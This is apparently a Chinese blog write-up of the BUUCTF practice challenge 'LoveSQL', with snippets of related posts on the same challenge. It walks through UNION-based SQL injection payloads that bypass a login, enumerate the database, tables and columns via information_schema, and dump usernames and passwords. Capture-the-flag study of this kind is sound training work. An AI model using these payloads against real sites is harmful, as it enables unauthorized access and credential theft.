buuctf刷题 [极客大挑战 2019]LoveSQL

已于 2024-11-29 21:28:52 修改
阅读量401 收藏 4
点赞数 4
文章标签: 数据库 mysql 网络安全 安全
于 2024-11-29 21:28:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79697181/article/details/144146175
版权

打开靶场发现是sql注入题,尝试注入万能密码发现有提示,用户名:admin密码:'efc73f14783cba4d3a4affdff5f5bbed'

尝试MD5解密密码发现解不出来,尝试union注入:

判断列数:0' or true group by 4 #

当group by到4时有报错,说明一共三列然后判断回显位

判断回显位:0' union select 1,2,3#

发现2、3位有回显

爆库:0' union select 1,database(),3#

爆表:0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

爆字段:0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name='l0ve1ysq1'#

获取数据:0' union select 1,group_concat(username,'~', password),3 from l0ve1ysq1#

云遮月~
关注
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 766
前言 本知识点:SQL注入 WP (这居然是个连续剧。。。 ) 首先尝试使用上一的解法绕过看看(上一 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 409
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看目 一看就和上一 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、目简介 进入目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
[极客挑战 2019]LoveSQL全网最详细WP
最新发布
siyue_secret的博客
04-03 162
是为了让union前的查询错误,查不到结果,避免影响union后查询数据库名的显示。照理来说,我们需要逐个测试当前查询的表是哪个表,但是此处。看起来像flag的东西出来了,往右拖动页面可以看到真正的flag值。按照ctf的做经验,应该先爆这个表。(6)爆username和password的值。(5)然后爆l0ve1ysq1表中的字段名。尝试使用union注入,一步一步来。此时可以看到页面正常显示,没有报错。由页面返回的信息可知,数据库名为。(4)然后爆geek数据库中的表。即按照第一列的值对结果排序,
[极客挑战2019]LoveSQL(刚!刚!刚!)
Rick66Ashley的博客
08-10 186
回到目,要查geek的数据表,那要加上数据库为geek的条件,即:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #中间的可以查看表名1' union select 1,2,group_concat(table_name) from information_schema.tables #1' or 1=1 # 密码随便输,enter,发现可以注入;
BUUCTF记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 226
BUUCTF记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
BUUCTF系列
qq_45655564的博客
07-11 576
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
buuctf(web)部分实操和知识点
Z11762的博客
04-18 1027
这里跟前面做过的一个看后端源码的很相似,就是:PHP的文件包含函数有一个「特性」,被包含的文件内容中,如果是「代码」则会执行,而不会在页面中展示;针对这一特性,我们可以使用PHP伪协议对文件内容进行「编码」,编码后的文件内容由于不能被执行,会展示在页面中,而后再将页面中的内容复制到本地进行「解码」,即可查看文件内容,拿到 flag。"https://Sycsecret.buuoj.cn" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。之后界面显示“No!
Buuctf Web
weixin_68029979的博客
04-24 2000
写在前面, 本人小白一枚,记录一下web做过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web,所以有些会没有思路,这时会参考其他佬的解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有目没有解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
极客挑战2019LoveSQL
Bird&Bird
10-25 2623
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一EasySQL的延续。 2、EasySQL那道采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
buuctf目[极客挑战 2019]LoveSQL
01-26
### BUUCTF 极客挑战 2019 LoveSQL 目解答 #### SQL 注入基础 在处理 SQL 注入攻击时,了解如何利用特定的 payload 来绕过验证机制至关重要。对于 `LoveSQL` 这道目,在之前的目中已经展示了通过万能密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值